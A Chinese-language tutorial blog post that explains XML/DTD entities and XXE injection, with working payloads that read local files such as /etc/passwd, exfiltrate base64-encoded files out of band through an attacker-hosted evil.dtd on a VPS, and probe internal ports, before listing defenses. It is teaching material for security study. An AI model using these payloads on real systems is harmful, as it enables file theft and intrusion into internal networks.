漏洞梳理篇之XXE

admin

146004
文章

119
评论

2020年11月4日08:20:50评论223 views字数 7118阅读23分43秒阅读模式

1.什么是XML

XML 模式通常被称为 XML 模式定义（XSD）。它被用来描述和验证 XML 数据的结构和内容。XML 模式定义元素，属性和数据类型。模式元素也支持命名空间。它类似于描述数据库中数据的数据库模式。

1.1元素

XML 元素指的是从（且包括）开始标签直到（且包括）结束标签的部分。元素可包含其他元素、文本或者两者的混合物。元素也可以拥有属性。如：

<bookstore><book category="CHILDREN">  <title>Harry Potter</title>   <author>J K. Rowling</author>   <year>2005</year>   <price>29.99</price> </book><book category="WEB">  <title>Learning XML</title>   <author>Erik T. Ray</author>   <year>2003</year>   <price>39.95</price> </book></bookstore>

在上例中，<bookstore> 和 <book> 都拥有*元素内容*，因为它们包含了其他元素。<author>只有*文本内容*，因为它仅包含文本。另外，只有 <book> 元素拥有*属性* (category="CHILDREN")。

1.2 属性

XML 元素可以在开始标签中包含属性，类似 HTML。属性 (Attribute) 提供关于元素的额外（附加）信息。

<file type="gif">computer.gif</file>

1.3 实体

实体是对数据的引用；根据实体种类的不同，XML 解析器将使用实体的替代文本或者外部文档的内容来替代实体引用。

字符实体
命名实体
外部实体
参数实体

XML 中的实体用于表示特殊字符（通常难以或不可能在标准键盘上输入），重用 XML 代码段，将文档组织为几个文件，以及简化 DTD 的编写。

' 是一个撇号：'
& 是一个与字符：&
" 是一个引号："
< 是一个小于号：<
> 是一个大于号：>

外部实体的概念：

外部实体表示外部文件的内容。外部实体引用其他文件

<!ENTITY chap1 SYSTEM "chapter-1.xml"><!ENTITY chap2 SYSTEM "chapter-2.xml"><!ENTITY chap3 SYSTEM "chapter-3.xml">

1.4 PCDATA

PCDATA是XML解析器解析的文本数据使用的一个术语。XML 文档中的文本通常解析为字符数据，或者（按照文档类型定义术语）称为 PCDATA。XML 解析器通常会解析 XML 文档中所有的文本。当某个 XML 元素被解析时，其标签之间的文本也会被解析：

<message>This text is also parsed</message>

解析器之所以这么做是因为 XML 元素可包含其他元素，就像这个实例中，其中的元素包含着另外的两个元素（first 和 last）：

<name><first>Bill</first><last>Gates</last></name>

而解析器会把它分解为像这样的子元素：

<name><first>Bill</first><last>Gates</last></name>

1.5 CDATA

CDATA 指的是不应由 XML 解析器进行解析的文本数据（Unparsed Character Data）。在 XML 元素中，"<" （新元素的开始）和 "&" （字符实体的开始）是非法的。某些文本，比如 JavaScript 代码，包含大量 "<" 或 "&" 字符。为了避免错误，可以将脚本代码定义为 CDATA。CDATA 部分中的所有内容都会被解析器忽略。CDATA 部分由 "" 结束。

术语 CDATA 是不应该由 XML 解析器解析的文本数据。像 "<" 和 "&" 字符在 XML 元素中都是非法的。"<" 会产生错误，因为解析器会把该字符解释为新元素的开始。"&" 会产生错误，因为解析器会把该字符解释为字符实体的开始。某些文本，比如 JavaScript 代码，包含大量 "<" 或 "&" 字符。为了避免错误，可以将脚本代码定义为 CDATA。CDATA 部分中的所有内容都会被解析器忽略。CDATA 部分由 "" 结束：

<script><![CDATA[function matchwo(a,b){if (a < b && a < 0) then{  return 1;}  else{  return 0;}}]]></script>

2.什么是DTD

文档类型定义（DTD）可定义合法的XML文档构建模块。它使用一系列合法的元素来定义文档的结构。DTD 可被成行地声明于 XML 文档中，也可作为一个外部引用。

2.1内部的 DOCTYPE 声明

假如 DTD 被包含在您的 XML 源文件中，它应当通过下面的语法包装在一个 DOCTYPE 声明中：

<!DOCTYPE root-element [element-declarations]>

带有 DTD 的 XML 文档实例:

<?xml version="1.0" ?><! DOCTYPE note [<!ELEMENT note (to,from,heading,body)><!ELEMENT to (#PCDATA)><!ELEMENT from (#PCDATA)><!ELEMENT heading (#PCDATA)><!ELEMENT body (#PCDATA)>]><note><to>Tove</to><from>Jani</from><heading>Reminder</heading><body>Don't forget me this weekend!</body></note>

!DOCTYPE note (第二行)定义此文档是 note 类型的文档。
!ELEMENT note (第三行)定义 note 元素有四个元素："to、from、heading,、body"
!ELEMENT to (第四行)定义 to 元素为 "#PCDATA" 类型
!ELEMENT from (第五行)定义 from 元素为 "#PCDATA" 类型
!ELEMENT heading (第六行)定义 heading 元素为 "#PCDATA" 类型
!ELEMENT body (第七行)定义 body 元素为 "#PCDATA" 类型

2.2外部文档声明

假如 DTD 位于 XML 源文件的外部，那么它应通过下面的语法被封装在一个 DOCTYPE 定义中：

<!DOCTYPE root-element SYSTEM "filename">

虽然这个 XML 文档和内部的文档声明相同，但是拥有一个外部的 DTD:

<?xml version="1.0"?><!DOCTYPE note SYSTEM "note.dtd"><note><to>Tove</to><from>Jani</from><heading>Reminder</heading><body>Don't forget me this weekend!</body></note>

这是包含 DTD 的 "note.dtd" 文件：

<! DOCTYPE note [<!ELEMENT note (to,from,heading,body)><!ELEMENT to (#PCDATA)><!ELEMENT from (#PCDATA)><!ELEMENT heading (#PCDATA)><!ELEMENT body (#PCDATA)>]>

2.3 DTD实体

DTD实体是用于定义引用普通文本或特殊字符的快捷方式的变量

实体引用是对实体的引用
实体可在内部或外部进行声明

可分为内部实体和外部实体

内部实体
外部实体

也可以分为一般实体和参数实体（内部外部都有）

一般实体(格式：&实体引用名;)
参数实体(格式：%实体引用名;)

内部实体声明

# 语法:<!ENTITY entity-name "entity-value">

一般实体

<!ENTITY writer "Donald Duck."><!ENTITY copyright "Copyright runoob.com">
<author>&writer;&copyright;</author>

参数实体

<!ENTITY % an-element "<!ELEMENT mytag (subtag)>"><!ENTITY % remote-dtd SYSTEM "http://somewhere.example.org/remote.dtd">%an-element; %remote-dtd;
<author>%writer;%copyright;</author>

外部实体声明

#一般实体格式：<!ENTITY 实体名称 "实体的值"><!ENTITY writer SYSTEM "http://somewhere.example.org/remote.dtd"><!ENTITY copyright SYSTEM "http://somewhere.example.org/remote.dtd">
<author>&writer;&copyright;</author>

参数实体

<?xml version="1.0"?><!DOCTYPE test [<!ENTITY % writer SYSTEM "http://somewhere.example.org/remote.dtd"><!ENTITY % copyright SYSTEM "http://somewhere.example.org/remote.dtd">]>
<author>%writer;%copyright;</author>

外部实体默认支持的协议

漏洞梳理篇之XXE

而且PHP在安装扩展后还能支持下面的协议：

漏洞梳理篇之XXE

3.XXE攻击

3.1 什么是XXE

XXE（XML外部实体注入，XML External Entity) ，在应用程序解析XML输入时，当允许引用外部实体时，可构造恶意内容，导致读取任意文件、探测内网端口、攻击内网网站、发起DoS拒绝服务攻击、执行系统命令等。

3.2 如何构建XXE

①通过DTD外部实体声明进行攻击

<?xml version="1.0"?><!DOCTYPE a[<!ENTITY ali SYSTEM "file:///etc/passwd">]><a>&ali;</a>

②通过DTD外部实体声明引入外部DTD文档，再引入外部实体声明(一般实体)

<?xml version="1.0"?><!DOCTYPE go [<!ENTITY ali SYSTEM "http://xmltest.com/xml.dtd">]><a>&ali;</a>
#http://xmltest.com/xml.dtd内容如下<!ENTITY ali SYSTEM "file:///etc/passwd">

3.3 XXE漏洞利用

①本地任意文件读取（有回显）,在服务器上面将doLogin.php修改为如下：

<?phplibxml_disable_entity_loader (false);$xmlfile = file_get_contents('php://input');$dom = new DOMDocument();$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);$creds = simplexml_import_dom($dom);echo $creds;?>

Windows系统使用payload：

<?xml version="1.0" encoding="utf-8"?>  <!DOCTYPE creds [  <!ENTITY ali SYSTEM "file:///c:/windows/system.ini"> ]><creds>&ali;</creds>

漏洞梳理篇之XXE

可以看到文件成功读取，但是可以看到读取的文件中并没有特殊符号，如果文件存在符号呢？

漏洞梳理篇之XXE

尝试文件读取：

漏洞梳理篇之XXE

发现当腰读取的文件中有特殊符回报错，无法读取到想要的文件。此时使用 CDATA解决报错问题，我们将读出来的数据，放在CDATA中输出即可；CDATA 部分中的所有内容都会被解析器忽略。在前面有讲到：

在 XML 元素中，"<" （新元素的开始）和 "&" （字符实体的开始）是非法的。某些文本，比如 JavaScript 代码，包含大量 "<" 或 "&" 字符。为了避免错误，可以将脚本代码定义为 CDATA。

https://mp.weixin.qq.com/cgi-bin/appmsg?t=media/appmsg_edit&action=edit&type=10&appmsgid=100001061&token=684418616&lang=zh_CN

使用payload：

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE roottag [<!ENTITY % start "<![CDATA["><!ENTITY % goodies SYSTEM "file:///d:/test.txt"><!ENTITY % end "]]>"><!ENTITY % dtd SYSTEM "http://ip/evil.dtd">%dtd; ]><roottag>&all;</roottag>

evil.dtd

<?xml version="1.0" encoding="UTF-8"?><!ENTITY all "%start;%goodies;%end;">

②本地任意文件读取（无回显）

在正常的环境中，使用XXE读取文件的时候，是没有回显的，这个时候呢可以把数据外带出来。除了发起请求以外，还得把我们的数据传出去，而且我们本身的数据也是一个对外的请求；所以就要对外请求两次，一次请求获取我们的数据，另外一次请求传送出我们的数据。使用参数实体进行实体引用了。

XXE_1.php

<?phplibxml_disable_entity_loader (false);$xmlfile = file_get_contents('php://input');$dom = new DOMDocument();$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);?>

在VPS上创建一个test.dtd

<!ENTITY % all "<!ENTITY &#x25; send SYSTEM 'http://vps的ip:端口/%file;'>">%all;

漏洞梳理篇之XXE

然后在VPS上开启http服务，端口为test.dtd中的端口。payload：

<!DOCTYPE message [  <!ENTITY % remote SYSTEM "http://VPS的http服务/test.dtd">  <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///C:/test.txt">  %remote;  %int;  %send;]>

这里用到base64编码，是因为避免读取数据时候，遇到空格无法读出

漏洞梳理篇之XXE

解密：

漏洞梳理篇之XXE

被攻击者：

漏洞梳理篇之XXE

可以看看调用的过程：

我们从 payload 中能看到连续调用了三个参数实体 %remote;%int;%send;，这就是我们的利用顺序， %remote 先调用，调用后请求远程服务器上的 test.dtd ，有点类似于将 test.dtd 包含进来，然后 %int 调用 test.dtd 中的 %file, %file 就会去获取服务器上面的敏感文件，然后将 %file 的结果填入到 %send 以后(因为实体的值中不能有 %, 所以将其转成html实体编码 %)，我们再调用 %send; 把我们的读取到的数据发送到我们的远程 vps 上，这样就实现了外带数据的效果，完美的解决了 XXE 无回显的问

-https://xz.aliyun.com/t/3357#toc-9

刚刚使用的Blind OOB XXE攻击方法，是通过file协议读取本地文件，前面也写到每个语言也可以使用多种协议（见 2.3.2外部实体声明----外部实体默认支持的协议）

③探测内网

通过前面的Blind OOB XXE方法可以看出，也可以进行SSRF，XXE 也是一种 SSRF 的攻击手法。可以进行内网的地址、端口的探测可以利用服务器响应时间的长短来判断端口是否被开启

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE note[<!ENTITY ali SYSTEM "http://ip:port">]>
<reset><login>&ali;</login><secret>Any bugs?</secret></reset>

探测80端口，显示信息如下：

漏洞梳理篇之XXE

探测3389端口，时间响应很久，可以看出3389端口并未打开

漏洞梳理篇之XXE

也可以查看响应包确认端口是否开放，通过返回的“HTTP request failed” 可以知道445端口是关闭的

漏洞梳理篇之XXE

4.XXE的防御

①使用开发语言提供的禁用外部实体的方法

PHP:

libxml_disable_entity_loader(true);

JAVA:

DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();dbf.setExpandEntityReferences(false);

Python：

from lxml import etree
xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))

②过滤用户提交的XML数据

对变量：<!DOCTYPE和<!ENTITY，或者，SYSTEM和PUBLIC进行过滤

③检查所使用的底层xml解析库，默认禁止外部实体的解析

漏洞梳理篇之XXE

本文始发于微信公众号（安全鸭）：漏洞梳理篇之XXE

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

漏洞梳理篇之XXE

护网时期来临，红队外网打点实战案例分享（二）

windows提权方法一览，管理员看完连夜改行卖炒粉。。。

【2025护网漏洞POC速存】吃苕皮喝挪瓦，HW轻松拿捏

攻防演练：近源渗透的20种实战手法！

100个风险突出的高危端口汇总一网打尽！

专题·人工智能安全 | 大模型联网的风险分析与应对举措

干货分享 | 实践中的越权漏洞总结

WEB漏洞挖掘之HTTP参数污染

浅析 JWT Attack

在内网中拿下DC的五种常用方法

发表评论

在线咨询

微信